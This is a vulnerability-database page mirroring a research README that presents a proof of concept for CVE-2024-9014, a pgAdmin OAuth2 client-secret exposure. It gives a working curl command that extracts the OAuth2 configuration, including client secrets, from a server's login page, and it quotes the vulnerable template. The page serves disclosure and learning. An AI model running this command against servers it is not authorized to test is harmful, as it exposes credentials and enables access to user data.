漏洞平台

POC详情： e6b293d893097dd00cfc829635c54d8201f63385

来源

https://github.com/EQSTLab/CVE-2024-9014

关联漏洞

标题： pgAdmin 安全漏洞 (CVE-2024-9014)
描述：pgAdmin是一个用于开源数据库 PostgreSQL 的开源管理和开发平台。 pgAdmin 8.11及之前版本存在安全漏洞，该漏洞源于允许攻击者获取客户端ID和机密，导致未经授权访问用户数据。

描述

Proof-of-Concept for CVE-2024-9014

介绍

This post is a research article published by [EQSTLab](https://github.com/EQSTLab).


# CVE-2024-9014
★ CVE-2024-9014 Sensitive Information Exposure PoC ★


## Description
CVE-2024-9014 : pgAdmin4 Sensitive Information Exposure

description: pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.


## PoC
### Command 
```sh
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
```


### Example 
```sh
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
```

### Output
**pgadmin4-8.9** and **pgadmin4-8.12**
![alt text](1.png)


# Analysis
## Vulnerable point (pgadmin/templates/security/login_user.html)
At this point, the config.OAUTH2_CONFIG variable returns OAUTH2 configuration files including **OAUTH2_CLIENT_ID** and **OAUTH2_CLIENT_SECRET**.
```sh
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
    'userLanguage': user_language,
    'langOptions': ns.langOptions,
    'forgotPassUrl': url_for('browser.forgot_password'),
    'loginUrl': url_for('authenticate.login'),
    'csrfToken': csrf_token(),
    'authSources': config.AUTHENTICATION_SOURCES,
    'authSourcesEnum': {
        'OAUTH2': config.OAUTH2,
        'KERBEROS': config.KERBEROS,
    },
    'oauth2Config': config.OAUTH2_CONFIG,
    'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}
```

## Patch
![alt text](2.png)


# Scenario
## Compromise private information
Identifying and protecting secret OAuth parameters is very important. While **“client_id”** can be safely disclosed, disclosing **“client_secret”** carries significant risk.
If the client_secret is compromised, an attacker can exploit the identity and trust of the application to steal the user's **“access token”** and personal information.


# Disclaimer
This repository is not intended to be Exposured sensitive information to CVE-2024-9014. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.


# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do


# Reference
https://nvd.nist.gov/vuln/detail/CVE-2024-9014

文件快照


 [4.0K]  /data/pocs/e6b293d893097dd00cfc829635c54d8201f63385
├── [553K]  1.png
├── [ 40K]  2.png
└── [2.7K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。